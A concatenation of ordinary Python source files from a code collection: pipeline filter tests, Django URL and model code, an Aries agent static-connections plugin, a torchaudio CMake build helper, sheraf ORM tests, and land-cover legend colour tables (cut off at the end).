if quintile < 4:
# There are 4 0s and one 1 in each row, so the first 4
# quintiles should be all the locations with zeros in the input
# array.
assert_array_equal(result, ~eye5.astype(bool))
# Should reject all the ones, plus the nans.
assert_array_equal(
nandata_result,
~(nanmask | eye6.astype(bool))
)
else:
# The last quintile should contain all the 1s.
assert_array_equal(result, eye(5, dtype=bool))
# Should accept all the 1s.
assert_array_equal(nandata_result, eye(6, dtype=bool))
def test_rank_percentile_nasty_partitions(self):
# Test case with nasty partitions: divide up 5 assets into quartiles.
data = arange(25, dtype=float).reshape(5, 5) % 4
nandata = data.copy()
nandata[eye(5, dtype=bool)] = nan
for quartile in range(4):
lower_bound = quartile * 25.0
upper_bound = (quartile + 1) * 25.0
factor = self.f.percentile_between(lower_bound, upper_bound)
# There isn't a nice definition of correct behavior here, so for
# now we guarantee the behavior of numpy.nanpercentile.
result = factor.compute_from_arrays([data], self.mask)
min_value = nanpercentile(data, lower_bound, axis=1, keepdims=True)
max_value = nanpercentile(data, upper_bound, axis=1, keepdims=True)
assert_array_equal(
result,
(min_value <= data) & (data <= max_value),
)
nanresult = factor.compute_from_arrays([nandata], self.mask)
min_value = nanpercentile(
nandata,
lower_bound,
axis=1,
keepdims=True,
)
max_value = nanpercentile(
nandata,
upper_bound,
axis=1,
keepdims=True,
)
assert_array_equal(
nanresult,
(min_value <= nandata) & (nandata <= max_value),
)
def test_sequenced_filter(self):
first = SomeFactor() < 1
first_input = eye(5)
first_result = first.compute_from_arrays([first_input], self.mask)
assert_array_equal(first_result, ~eye(5, dtype=bool))
# Second should pick out the fourth column.
second = SomeFactor().eq(3.0)
second_input = arange(25, dtype=float).reshape(5, 5) % 5
sequenced = first.then(second)
result = sequenced.compute_from_arrays(
[first_result, second_input],
self.mask,
)
expected_result = (first_result & (second_input == 3.0))
assert_array_equal(result, expected_result)
def test_sequenced_filter_order_dependent(self):
f = SomeFactor() < 1
f_input = eye(5)
f_result = f.compute_from_arrays([f_input], self.mask)
assert_array_equal(f_result, ~eye(5, dtype=bool))
g = SomeFactor().percentile_between(80, 100)
g_input = arange(25, dtype=float).reshape(5, 5) % 5
g_result = g.compute_from_arrays([g_input], self.mask)
assert_array_equal(g_result, g_input == 4)
result = f.then(g).compute_from_arrays(
[f_result, g_input],
self.mask,
)
# Input data is strictly increasing, so the result should be the top
# value not filtered by first.
expected_result = array(
[[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 1, 0]],
dtype=bool,
)
assert_array_equal(result, expected_result)
result = g.then(f).compute_from_arrays(
[g_result, f_input],
self.mask,
)
# Percentile calculated first, then diagonal is removed.
expected_result = array(
[[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]],
dtype=bool,
)
assert_array_equal(result, expected_result)
|
py | b4153727003983bde722f09402284f415bc08338 | from django.conf.urls import url
from .views import GetAuthToken, GetAuthTokenFacebook
urlpatterns = [
url(r'^$', GetAuthToken.as_view()),
url(r'^facebook/$', GetAuthTokenFacebook.as_view()),
]
|
py | b41537e682975d47032a5e114fa1e79ea9cae067 |
from my import print_hello
#import my
print_hello()
|
py | b41538028ec54a0b3e2a1d78a7866affad717f58 | """
13771. Presents
Author: xCrypt0r
Language: Python 3
Memory used: 29,380 KB
Runtime: 64 ms
Solved on: September 24, 2020
"""
from sys import stdin
input = stdin.readline
def main():
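    # Read n, then n prices; after sorting ascending, index 1 is the price of
    # the second-cheapest present, printed with two decimal places.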
prices = sorted([float(input()) for _ in range(int(input()))])
print(f'{prices[1]:.2f}')
if __name__ == '__main__':
main() |
py | b41538426f591cf112e3bf69b6a02812d3e3e56f | """Define messages for static connections management admin protocol."""
# pylint: disable=invalid-name
# pylint: disable=too-few-public-methods
from marshmallow import fields, validate
from aries_cloudagent.wallet.base import BaseWallet
from aries_cloudagent.messaging.base_handler import BaseHandler, BaseResponder, RequestContext
from aries_cloudagent.protocols.connections.manager import ConnectionManager
from aries_cloudagent.connections.models.connection_record import ConnectionRecord
from aries_cloudagent.connections.models.diddoc import (
DIDDoc, PublicKey, PublicKeyType, Service
)
from aries_cloudagent.protocols.problem_report.message import ProblemReport
from aries_cloudagent.storage.error import StorageNotFoundError
from .util import generate_model_schema, admin_only
PROTOCOL = 'did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/admin-static-connections/0.1'
# Message Types
CREATE_STATIC_CONNECTION = '{}/create-static-connection'.format(PROTOCOL)
STATIC_CONNECTION_INFO = '{}/static-connection-info'.format(PROTOCOL)
STATIC_CONNECTION_GET_LIST = '{}/static-connection-get-list'.format(PROTOCOL)
STATIC_CONNECTION_LIST = '{}/static-connection-list'.format(PROTOCOL)
# Message Type to Message Class Map
MESSAGE_TYPES = {
CREATE_STATIC_CONNECTION:
'acapy_plugin_toolbox.static_connections'
'.CreateStaticConnection',
STATIC_CONNECTION_INFO:
'acapy_plugin_toolbox.static_connections'
'.StaticConnectionInfo',
STATIC_CONNECTION_GET_LIST:
'acapy_plugin_toolbox.static_connections'
'.StaticConnectionGetList',
STATIC_CONNECTION_LIST:
'acapy_plugin_toolbox.static_connections'
'.StaticConnectionList',
}
# Models and Schemas
CreateStaticConnection, CreateStaticConnectionSchema = generate_model_schema(
name='CreateStaticConnection',
handler='acapy_plugin_toolbox.static_connections'
'.CreateStaticConnectionHandler',
msg_type=CREATE_STATIC_CONNECTION,
schema={
'label': fields.Str(required=True),
'role': fields.Str(required=False),
'static_did': fields.Str(required=True),
'static_key': fields.Str(required=True),
'static_endpoint': fields.Str(missing='')
}
)
StaticConnectionInfo, StaticConnectionInfoSchema = generate_model_schema(
name='StaticConnectionInfo',
handler='acapy_plugin_toolbox.static_connections'
'.StaticConnectionInfoHandler',
msg_type=STATIC_CONNECTION_INFO,
schema={
'did': fields.Str(required=True),
'key': fields.Str(required=True),
'endpoint': fields.Str(required=True)
}
)
class CreateStaticConnectionHandler(BaseHandler):
"""Handler for static connection creation requests."""
@admin_only
async def handle(self, context: RequestContext, responder: BaseResponder):
"""Handle static connection creation request."""
connection_mgr = ConnectionManager(context)
wallet: BaseWallet = await context.inject(BaseWallet)
# Make our info for the connection
my_info = await wallet.create_local_did()
# Create connection record
connection = ConnectionRecord(
initiator=ConnectionRecord.INITIATOR_SELF,
my_did=my_info.did,
their_did=context.message.static_did,
their_label=context.message.label,
their_role=context.message.role if context.message.role else None,
state=ConnectionRecord.STATE_ACTIVE,
invitation_mode=ConnectionRecord.INVITATION_MODE_STATIC
)
# Construct their did doc from the basic components in message
diddoc = DIDDoc(context.message.static_did)
public_key = PublicKey(
did=context.message.static_did,
ident="1",
value=context.message.static_key,
pk_type=PublicKeyType.ED25519_SIG_2018,
controller=context.message.static_did
)
service = Service(
did=context.message.static_did,
ident="indy",
typ="IndyAgent",
recip_keys=[public_key],
routing_keys=[],
endpoint=context.message.static_endpoint
)
diddoc.set(public_key)
diddoc.set(service)
# Save
await connection_mgr.store_did_document(diddoc)
await connection.save(
context,
reason='Created new static connection'
)
# Prepare response
info = StaticConnectionInfo(
did=my_info.did,
key=my_info.verkey,
endpoint=context.settings.get("default_endpoint")
)
info.assign_thread_from(context.message)
await responder.send_reply(info)
return
StaticConnectionGetList, StaticConnectionGetListSchema = generate_model_schema(
name='StaticConnectionGetList',
handler='acapy_plugin_toolbox.static_connections'
'.StaticConnectionGetListHandler',
msg_type=STATIC_CONNECTION_GET_LIST,
schema={
'initiator': fields.Str(
validate=validate.OneOf(['self', 'external']),
required=False,
),
'invitation_key': fields.Str(required=False),
'my_did': fields.Str(required=False),
'their_did': fields.Str(required=False),
'their_role': fields.Str(required=False)
}
)
StaticConnectionList, StaticConnectionListSchema = generate_model_schema(
name='StaticConnectionList',
handler='acapy_plugin_toolbox.util.PassHandler',
msg_type=STATIC_CONNECTION_LIST,
schema={
'results': fields.List(fields.Dict(
connection_id=fields.Str(),
their_info=fields.Dict(
label=fields.Str(),
did=fields.Str(),
vk=fields.Str(),
endpoint=fields.Str()
),
my_info=fields.Dict(
label=fields.Str(),
did=fields.Str(),
vk=fields.Str(),
endpoint=fields.Str()
)
))
}
)
class StaticConnectionGetListHandler(BaseHandler):
"""Handler for static connection get list requests."""
@admin_only
async def handle(self, context: RequestContext, responder: BaseResponder):
"""Handle static connection get list request."""
connection_mgr = ConnectionManager(context)
wallet: BaseWallet = await context.inject(BaseWallet)
try:
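            # Build the tag filter from only the criteria the admin supplied
            # (non-None values), always restricting results to static connections.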
tag_filter = dict(
filter(lambda item: item[1] is not None, {
'initiator': context.message.initiator,
'invitation_key': context.message.invitation_key,
'my_did': context.message.my_did,
'invitation_mode': ConnectionRecord.INVITATION_MODE_STATIC,
'their_did': context.message.their_did,
'their_role': context.message.their_role
}.items())
)
records = await ConnectionRecord.query(context, tag_filter)
except StorageNotFoundError:
report = ProblemReport(
explain_ltxt='Connection not found.',
who_retries='none'
)
report.assign_thread_from(context.message)
await responder.send_reply(report)
return
def flatten_target(connection, target, my_info):
"""Map for flattening results."""
return {
'connection_id': connection.connection_id,
'their_info': {
'label': target.label,
'did': target.did,
'vk': target.recipient_keys[0],
'endpoint': target.endpoint
},
'my_info': {
'did': my_info.did,
'vk': my_info.verkey,
'endpoint': context.settings.get("default_endpoint")
}
}
targets = []
my_info = []
for record in records:
targets.append(
await connection_mgr.get_connection_target(record)
)
my_info.append(await wallet.get_local_did(record.my_did))
results = list(map(
flatten_target,
records,
targets,
my_info
))
static_connections = StaticConnectionList(results=results)
static_connections.assign_thread_from(context.message)
await responder.send_reply(static_connections)
|
py | b415388a70b99fa12a18dc0a0455347b2898dd1a | import os
import platform
import subprocess
from pathlib import Path
import distutils.sysconfig
from setuptools import Extension
from setuptools.command.build_ext import build_ext
import torch
__all__ = [
'get_ext_modules',
'CMakeBuild',
]
_THIS_DIR = Path(__file__).parent.resolve()
_ROOT_DIR = _THIS_DIR.parent.parent.resolve()
_TORCHAUDIO_DIR = _ROOT_DIR / 'torchaudio'
def _get_build(var, default=False):
if var not in os.environ:
return default
val = os.environ.get(var, '0')
trues = ['1', 'true', 'TRUE', 'on', 'ON', 'yes', 'YES']
falses = ['0', 'false', 'FALSE', 'off', 'OFF', 'no', 'NO']
if val in trues:
return True
if val not in falses:
print(
f'WARNING: Unexpected environment variable value `{var}={val}`. '
f'Expected one of {trues + falses}')
return False
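# Example (illustrative): running `BUILD_SOX=0 BUILD_RNNT=off python setup.py develop`
# turns those components off below, since _get_build() treats "0", "false", "off",
# "no" (and their upper-case spellings) as False.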
_BUILD_SOX = False if platform.system() == 'Windows' else _get_build("BUILD_SOX", True)
_BUILD_KALDI = False if platform.system() == 'Windows' else _get_build("BUILD_KALDI", True)
_BUILD_RNNT = _get_build("BUILD_RNNT", True)
_USE_ROCM = _get_build("USE_ROCM", torch.cuda.is_available() and torch.version.hip is not None)
_USE_CUDA = _get_build("USE_CUDA", torch.cuda.is_available() and torch.version.hip is None)
_TORCH_CUDA_ARCH_LIST = os.environ.get('TORCH_CUDA_ARCH_LIST', None)
def get_ext_modules():
return [Extension(name='torchaudio._torchaudio', sources=[])]
# Based off of
# https://github.com/pybind/cmake_example/blob/580c5fd29d4651db99d8874714b07c0c49a53f8a/setup.py
class CMakeBuild(build_ext):
def run(self):
try:
subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError("CMake is not available.")
super().run()
def build_extension(self, ext):
extdir = os.path.abspath(
os.path.dirname(self.get_ext_fullpath(ext.name)))
# required for auto-detection of auxiliary "native" libs
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
cfg = "Debug" if self.debug else "Release"
cmake_args = [
f"-DCMAKE_BUILD_TYPE={cfg}",
f"-DCMAKE_PREFIX_PATH={torch.utils.cmake_prefix_path}",
f"-DCMAKE_INSTALL_PREFIX={extdir}",
'-DCMAKE_VERBOSE_MAKEFILE=ON',
f"-DPython_INCLUDE_DIR={distutils.sysconfig.get_python_inc()}",
f"-DBUILD_SOX:BOOL={'ON' if _BUILD_SOX else 'OFF'}",
f"-DBUILD_KALDI:BOOL={'ON' if _BUILD_KALDI else 'OFF'}",
f"-DBUILD_RNNT:BOOL={'ON' if _BUILD_RNNT else 'OFF'}",
"-DBUILD_TORCHAUDIO_PYTHON_EXTENSION:BOOL=ON",
"-DBUILD_LIBTORCHAUDIO:BOOL=OFF",
f"-DUSE_ROCM:BOOL={'ON' if _USE_ROCM else 'OFF'}",
f"-DUSE_CUDA:BOOL={'ON' if _USE_CUDA else 'OFF'}",
]
build_args = [
'--target', 'install'
]
# Pass CUDA architecture to cmake
if _TORCH_CUDA_ARCH_LIST is not None:
# Convert MAJOR.MINOR[+PTX] list to new style one
# defined at https://cmake.org/cmake/help/latest/prop_tgt/CUDA_ARCHITECTURES.html
_arches = _TORCH_CUDA_ARCH_LIST.replace('.', '').split(";")
_arches = [arch[:-4] if arch.endswith("+PTX") else f"{arch}-real" for arch in _arches]
cmake_args += [f"-DCMAKE_CUDA_ARCHITECTURES={';'.join(_arches)}"]
# Default to Ninja
if 'CMAKE_GENERATOR' not in os.environ or platform.system() == 'Windows':
cmake_args += ["-GNinja"]
if platform.system() == 'Windows':
import sys
python_version = sys.version_info
cmake_args += [
"-DCMAKE_C_COMPILER=cl",
"-DCMAKE_CXX_COMPILER=cl",
f"-DPYTHON_VERSION={python_version.major}.{python_version.minor}",
]
# Set CMAKE_BUILD_PARALLEL_LEVEL to control the parallel build level
# across all generators.
if "CMAKE_BUILD_PARALLEL_LEVEL" not in os.environ:
# self.parallel is a Python 3 only way to set parallel jobs by hand
# using -j in the build_ext call, not supported by pip or PyPA-build.
if hasattr(self, "parallel") and self.parallel:
# CMake 3.12+ only.
build_args += ["-j{}".format(self.parallel)]
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(
["cmake", str(_ROOT_DIR)] + cmake_args, cwd=self.build_temp)
subprocess.check_call(
["cmake", "--build", "."] + build_args, cwd=self.build_temp)
def get_ext_filename(self, fullname):
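        # Strip the interpreter/ABI tag (e.g. "cpython-39-x86_64-linux-gnu") from
        # the generated filename so the extension is named plain "_torchaudio.<ext>".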
ext_filename = super().get_ext_filename(fullname)
ext_filename_parts = ext_filename.split('.')
without_abi = ext_filename_parts[:-2] + ext_filename_parts[-1:]
ext_filename = '.'.join(without_abi)
return ext_filename
|
py | b415388af430b1ef278d51ddd7b25621e2cf18d4 | import uuid
import pytest
import sheraf
import tests
class Horse(sheraf.AttributeModel):
name = sheraf.StringAttribute().index(primary=True)
size = sheraf.IntegerAttribute()
class Cowboy(tests.UUIDAutoModel):
name = sheraf.StringAttribute()
horses = sheraf.IndexedModelAttribute(Horse)
def test_create(sheraf_connection):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert "Jolly Jumper" == jolly.name
assert jolly.mapping == george.mapping["horses"]["name"]["Jolly Jumper"]
def test_read(sheraf_database):
with sheraf.connection(commit=True):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert jolly == george.horses.read("Jolly Jumper")
assert jolly == george.horses.read(name="Jolly Jumper")
with sheraf.connection():
george = Cowboy.read(george.id)
assert jolly == george.horses.read("Jolly Jumper")
assert jolly == george.horses.read(name="Jolly Jumper")
with pytest.raises(sheraf.ModelObjectNotFoundException):
george.horses.read("any horse")
with pytest.raises(sheraf.ModelObjectNotFoundException):
george.horses.read(name="YO")
def test_read_these(sheraf_database):
with sheraf.connection(commit=True):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
polly = george.horses.create(name="Polly Pumper")
with sheraf.connection():
george = Cowboy.read(george.id)
assert [jolly, polly] == list(
george.horses.read_these(("Jolly Jumper", "Polly Pumper"))
)
def test_delete(sheraf_connection):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert george.horses.get() == jolly
assert george.horses.read("Jolly Jumper") == jolly
jolly.delete()
with pytest.raises(sheraf.exceptions.EmptyQuerySetUnpackException):
george.horses.get()
with pytest.raises(sheraf.ModelObjectNotFoundException):
assert george.horses.read("Jolly Jumper")
def test_create_dict(sheraf_connection):
george = Cowboy.create(
name="George",
horses=[dict(name="Jolly Jumper"), dict(name="Polly Pumper")],
)
jolly = george.horses.read("Jolly Jumper")
polly = george.horses.read("Polly Pumper")
assert jolly.mapping == george.mapping["horses"]["name"]["Jolly Jumper"]
assert polly.mapping == george.mapping["horses"]["name"]["Polly Pumper"]
def test_string_model(sheraf_database):
class Horseboy(tests.UUIDAutoModel):
name = sheraf.StringAttribute()
horses = sheraf.IndexedModelAttribute(Horse)
with sheraf.connection():
george = Horseboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert isinstance(jolly, Horse)
assert isinstance(george.horses.read("Jolly Jumper"), Horse)
def test_count(sheraf_connection):
george = Cowboy.create(name="George")
assert 0 == george.horses.count()
george.horses.create(name="Jolly Jumper")
assert 1 == george.horses.count()
def test_all(sheraf_connection):
george = Cowboy.create(name="George")
assert [] == list(george.horses.all())
jolly = george.horses.create(name="Jolly Jumper")
assert [jolly] == list(george.horses.all())
polly = george.horses.create(name="Polly pumper")
assert [jolly, polly] == list(george.horses.all())
def test_primary_attribute_cannot_be_edited(sheraf_connection):
first_id = str(uuid.uuid4())
second_id = str(uuid.uuid4())
george = Cowboy.create(id=first_id)
assert george.id == first_id
with pytest.raises(sheraf.SherafException):
george.id = second_id
assert george.id == first_id
def test_unchanged_primary_attribute_can_be_assigned(sheraf_connection):
first_id = str(uuid.uuid4())
george = Cowboy.create(id=first_id)
assert george.id == first_id
george.id = first_id
assert george.id == first_id
def test_no_primary_key(sheraf_database):
class HorseWithNoName(sheraf.AttributeModel):
foo = sheraf.SimpleAttribute()
bar = sheraf.SimpleAttribute()
class HorseKeeper(tests.UUIDAutoModel):
horses = sheraf.IndexedModelAttribute(HorseWithNoName)
with sheraf.connection():
keeper = HorseKeeper.create()
with pytest.raises(sheraf.PrimaryKeyException):
keeper.horses.create()
def test_get(sheraf_connection):
george = Cowboy.create(name="George")
with pytest.raises(sheraf.QuerySetUnpackException):
george.horses.get()
jolly = george.horses.create(name="Jolly Jumper")
assert jolly == george.horses.get()
george.horses.create(name="Polly Pumper")
with pytest.raises(sheraf.QuerySetUnpackException):
george.horses.get()
def test_filter(sheraf_connection):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper", size=5)
polly = george.horses.create(name="Polly Pumper", size=5)
george.horses.create(name="Loosy Lumper", size=4)
assert [jolly, polly] == list(george.horses.filter(size=5))
assert [] == george.horses.filter(size=90000)
def test_order(sheraf_connection):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper", size=6)
polly = george.horses.create(name="Polly Pumper", size=5)
loosy = george.horses.create(name="Loosy Lumper", size=4)
assert [jolly, polly, loosy] == george.horses.order(size=sheraf.DESC)
assert [loosy, polly, jolly] == george.horses.order(size=sheraf.ASC)
def test_on_creation(sheraf_connection):
class SubModelA(sheraf.AttributeModel):
id = sheraf.StringAttribute().index(primary=True)
trigger = sheraf.BooleanAttribute(default=False)
class SubModelB(sheraf.AttributeModel):
id = sheraf.StringAttribute().index(primary=True)
trigger = sheraf.BooleanAttribute(default=False)
class Model(tests.IntAutoModel):
sub_a = sheraf.IndexedModelAttribute(SubModelA)
sub_b = sheraf.IndexedModelAttribute(SubModelB)
@SubModelA.on_creation
def foo_creation(model):
model.trigger = True
m = Model.create(sub_a=[{"id": "A"}], sub_b=[{"id": "B"}])
assert m.sub_a.read("A").trigger
assert not m.sub_b.read("B").trigger
def test_on_deletion(sheraf_connection):
class SubModel(sheraf.AttributeModel):
id = sheraf.StringAttribute().index(primary=True)
trigger = False
class Model(tests.IntAutoModel):
sub = sheraf.IndexedModelAttribute(SubModel)
@SubModel.on_deletion
def foo_deletion(model):
SubModel.trigger = True
m = Model.create(sub=[{"id": "A"}])
assert not SubModel.trigger
m.sub.read("A").delete()
assert SubModel.trigger
class IndexedHorse(sheraf.AttributeModel):
name = sheraf.StringAttribute().index(primary=True)
size = sheraf.IntegerAttribute()
class IndexedCowboy(tests.UUIDAutoModel):
name = sheraf.StringAttribute()
horses = sheraf.IndexedModelAttribute("IndexedHorse").index(unique=True)
def test_indexation(sheraf_connection):
george = IndexedCowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
polly = george.horses.create(name="Polly Pumper")
george.index_keys("horses") == {
jolly.identifier,
polly.identifier,
}
    assert IndexedCowboy.search_keys(horses=jolly) == jolly.name
    assert IndexedCowboy.search_keys(horses=jolly.name) == jolly.name
horses_table = sheraf_connection.root()[IndexedCowboy.table]["horses"]
assert set(horses_table.keys()) == {
jolly.identifier,
polly.identifier,
}
assert IndexedCowboy.search(horses=jolly.name).get() == george
assert IndexedCowboy.search(horses=jolly).get() == george
george = IndexedCowboy.read(george.id)
assert set(horses_table.keys()) == {
jolly.identifier,
polly.identifier,
}
assert IndexedCowboy.search(horses=jolly.name).get() == george
assert IndexedCowboy.search(horses=jolly).get() == george
dolly = george.horses.create(name="Dolly Dumper")
assert set(horses_table.keys()) == {
jolly.identifier,
polly.identifier,
dolly.identifier,
}
assert IndexedCowboy.search(horses=jolly.name).get() == george
assert IndexedCowboy.search(horses=jolly).get() == george
assert IndexedCowboy.search(horses=dolly.name).get() == george
assert IndexedCowboy.search(horses=dolly).get() == george
class ReverseIndexedHorse(sheraf.AttributeModel):
name = sheraf.StringAttribute().index(primary=True)
size = sheraf.IntegerAttribute()
cowboy = sheraf.ReverseModelAttribute("ReverseIndexedCowboy", "horses")
class ReverseIndexedCowboy(tests.UUIDAutoModel):
name = sheraf.StringAttribute()
horses = sheraf.IndexedModelAttribute("ReverseIndexedHorse").index(unique=True)
def test_reverse_indexation(sheraf_connection):
george = ReverseIndexedCowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert jolly.cowboy == george
|
py | b41538ab2ae5e54e586f6fdf660d9b18e895499d | from django.db import models
from django.core.urlresolvers import reverse
#tables
class Book(models.Model):
def get_absolute_url(self):
return reverse('books:details', kwargs={'pk':self.pk})
def __str__(self):
return self.name + '-' + self.author
name = models.CharField(max_length=100)
author = models.CharField(max_length=100)
price = models.CharField(max_length=100)
type = models.CharField(max_length=100)
book_image = models.CharField(max_length=1000)
# second table
# class table_name(models.Model):
|
py | b41538e75e95be34464a490cb0e7b3f78c867550 | """Module of sample legends for some commonly used geospatial datasets.
"""
import os
# Land Cover datasets in Earth Engine https://developers.google.com/earth-engine/datasets/tags/landcover
builtin_legends = {
# National Land Cover Database 2016 (NLCD2016) Legend https://www.mrlc.gov/data/legends/national-land-cover-database-2016-nlcd2016-legend
"NLCD": {
"11 Open Water": "466b9f",
"12 Perennial Ice/Snow": "d1def8",
"21 Developed, Open Space": "dec5c5",
"22 Developed, Low Intensity": "d99282",
"23 Developed, Medium Intensity": "eb0000",
"24 Developed High Intensity": "ab0000",
"31 Barren Land (Rock/Sand/Clay)": "b3ac9f",
"41 Deciduous Forest": "68ab5f",
"42 Evergreen Forest": "1c5f2c",
"43 Mixed Forest": "b5c58f",
"51 Dwarf Scrub": "af963c",
"52 Shrub/Scrub": "ccb879",
"71 Grassland/Herbaceous": "dfdfc2",
"72 Sedge/Herbaceous": "d1d182",
"73 Lichens": "a3cc51",
"74 Moss": "82ba9e",
"81 Pasture/Hay": "dcd939",
"82 Cultivated Crops": "ab6c28",
"90 Woody Wetlands": "b8d9eb",
"95 Emergent Herbaceous Wetlands": "6c9fb8",
},
# https://developers.google.com/earth-engine/datasets/catalog/ESA_WorldCover_v100
"ESA_WorldCover": {
"10 Trees": "006400",
"20 Shrubland": "ffbb22",
"30 Grassland": "ffff4c",
"40 Cropland": "f096ff",
"50 Built-up": "fa0000",
"60 Barren / sparse vegetation": "b4b4b4",
"70 Snow and ice": "f0f0f0",
"80 Open water": "0064c8",
"90 Herbaceous wetland": "0096a0",
"95 Mangroves": "00cf75",
"100 Moss and lichen": "fae6a0",
},
# https://samapriya.github.io/awesome-gee-community-datasets/projects/esrilc2020/
"ESRI_LandCover": {
"Water": "1A5BAB",
"Trees": "358221",
"Grass": "A7D282",
"Flooded Vegetation": "87D19E",
"Crops": "FFDB5C",
"Scrub/Shrub": "EECFA8",
"Built Area": "ED022A",
"Bare Ground": "EDE9E4",
"Snow/Ice": "F2FAFF",
"Clouds": "C8C8C8",
},
# National Wetlands Inventory Legend: https://www.fws.gov/wetlands/data/Mapper-Wetlands-Legend.html
"NWI": {
"Freshwater- Forested and Shrub wetland": (0, 136, 55),
"Freshwater Emergent wetland": (127, 195, 28),
"Freshwater pond": (104, 140, 192),
"Estuarine and Marine wetland": (102, 194, 165),
"Riverine": (1, 144, 191),
"Lakes": (19, 0, 124),
"Estuarine and Marine Deepwater": (0, 124, 136),
"Other Freshwater wetland": (178, 134, 86),
},
# MCD12Q1.051 Land Cover Type Yearly Global 500m https://developers.google.com/earth-engine/datasets/catalog/MODIS_051_MCD12Q1
"MODIS/051/MCD12Q1": {
"0 Water": "1c0dff",
"1 Evergreen needleleaf forest": "05450a",
"2 Evergreen broadleaf forest": "086a10",
"3 Deciduous needleleaf forest": "54a708",
"4 Deciduous broadleaf forest": "78d203",
"5 Mixed forest": "009900",
"6 Closed shrublands": "c6b044",
"7 Open shrublands": "dcd159",
"8 Woody savannas": "dade48",
"9 Savannas": "fbff13",
"10 Grasslands": "b6ff05",
"11 Permanent wetlands": "27ff87",
"12 Croplands": "c24f44",
"13 Urban and built-up": "a5a5a5",
"14 Cropland/natural vegetation mosaic": "ff6d4c",
"15 Snow and ice": "69fff8",
"16 Barren or sparsely vegetated": "f9ffa4",
"254 Unclassified": "ffffff",
},
# MCD12Q1.006 Land Cover Type Yearly Global 500m https://developers.google.com/earth-engine/datasets/catalog/MODIS_006_MCD12Q1
"MODIS/006/MCD12Q1": {
"1 Evergreen needleleaf forest": "05450a",
"2 Evergreen broadleaf forest": "086a10",
"3 Deciduous needleleaf forest": "54a708",
"4 Deciduous broadleaf forest": "78d203",
"5 Mixed forest": "009900",
"6 Closed shrublands": "c6b044",
"7 Open shrublands": "dcd159",
"8 Woody savannas": "dade48",
"9 Savannas": "fbff13",
"10 Grasslands": "b6ff05",
"11 Permanent wetlands": "27ff87",
"12 Croplands": "c24f44",
"13 Urban and built-up": "a5a5a5",
"14 Cropland/natural vegetation mosaic": "ff6d4c",
"15 Snow and ice": "69fff8",
"16 Barren or sparsely vegetated": "f9ffa4",
"17 Water bodies": "1c0dff",
},
# GlobCover: Global Land Cover Map https://developers.google.com/earth-engine/datasets/catalog/ESA_GLOBCOVER_L4_200901_200912_V2_3
"GLOBCOVER": {
"11 Post-flooding or irrigated croplands": "aaefef",
"14 Rainfed croplands": "ffff63",
"20 Mosaic cropland (50-70%) / vegetation (grassland, shrubland, forest) (20-50%)": "dcef63",
"30 Mosaic vegetation (grassland, shrubland, forest) (50-70%) / cropland (20-50%)": "cdcd64",
"40 Closed to open (>15%) broadleaved evergreen and/or semi-deciduous forest (>5m)": "006300",
"50 Closed (>40%) broadleaved deciduous forest (>5m)": "009f00",
"60 Open (15-40%) broadleaved deciduous forest (>5m)": "aac700",
"70 Closed (>40%) needleleaved evergreen forest (>5m)": "003b00",
"90 Open (15-40%) needleleaved deciduous or evergreen forest (>5m)": "286300",
"100 Closed to open (>15%) mixed broadleaved and needleleaved forest (>5m)": "788300",
"110 Mosaic forest-shrubland (50-70%) / grassland (20-50%)": "8d9f00",
"120 Mosaic grassland (50-70%) / forest-shrubland (20-50%)": "bd9500",
"130 Closed to open (>15%) shrubland (<5m)": "956300",
"140 Closed to open (>15%) grassland": "ffb431",
"150 Sparse (>15%) vegetation (woody vegetation, shrubs, grassland)": "ffebae",
"160 Closed (>40%) broadleaved forest regularly flooded - Fresh water": "00785a",
"170 Closed (>40%) broadleaved semi-deciduous and/or evergreen forest regularly flooded - saline water": "009578",
"180 Closed to open (>15%) vegetation (grassland, shrubland, woody vegetation) on regularly flooded or waterlogged soil - fresh, brackish or saline water": "00dc83",
"190 Artificial surfaces and associated areas (urban areas >50%) GLOBCOVER 2009": "c31300",
"200 Bare areas": "fff5d6",
"210 Water bodies": "0046c7",
"220 Permanent snow and ice": "ffffff",
"230 Unclassified": "743411",
},
# Global PALSAR-2/PALSAR Forest/Non-Forest Map https://developers.google.com/earth-engine/datasets/catalog/JAXA_ALOS_PALSAR_YEARLY_FNF
"JAXA/PALSAR": {
"1 Forest": "006400",
"2 Non-Forest": "FEFF99",
"3 Water": "0000FF",
},
# Oxford MAP: Malaria Atlas Project Fractional International Geosphere-Biosphere Programme Landcover https://developers.google.com/earth-engine/datasets/catalog/Oxford_MAP_IGBP_Fractional_Landcover_5km_Annual
"Oxford": {
"0 Water": "032f7e",
"1 Evergreen_Needleleaf_Fores": "02740b",
"2 Evergreen_Broadleaf_Forest": "02740b",
"3 Deciduous_Needleleaf_Forest": "8cf502",
"4 Deciduous_Broadleaf_Forest": "8cf502",
"5 Mixed_Forest": "a4da01",
"6 Closed_Shrublands": "ffbd05",
"7 Open_Shrublands": "ffbd05",
"8 Woody_Savannas": "7a5a02",
"9 Savannas": "f0ff0f",
"10 Grasslands": "869b36",
"11 Permanent_Wetlands": "6091b4",
"12 Croplands": "ff4e4e",
"13 Urban_and_Built-up": "999999",
"14 Cropland_Natural_Vegetation_Mosaic": "ff4e4e",
"15 Snow_and_Ice": "ffffff",
"16 Barren_Or_Sparsely_Vegetated": "feffc0",
"17 Unclassified": "020202",
},
# Canada AAFC Annual Crop Inventory https://developers.google.com/earth-engine/datasets/catalog/AAFC_ACI
"AAFC/ACI": {
"10 Cloud": "000000",
"20 Water": "3333ff",
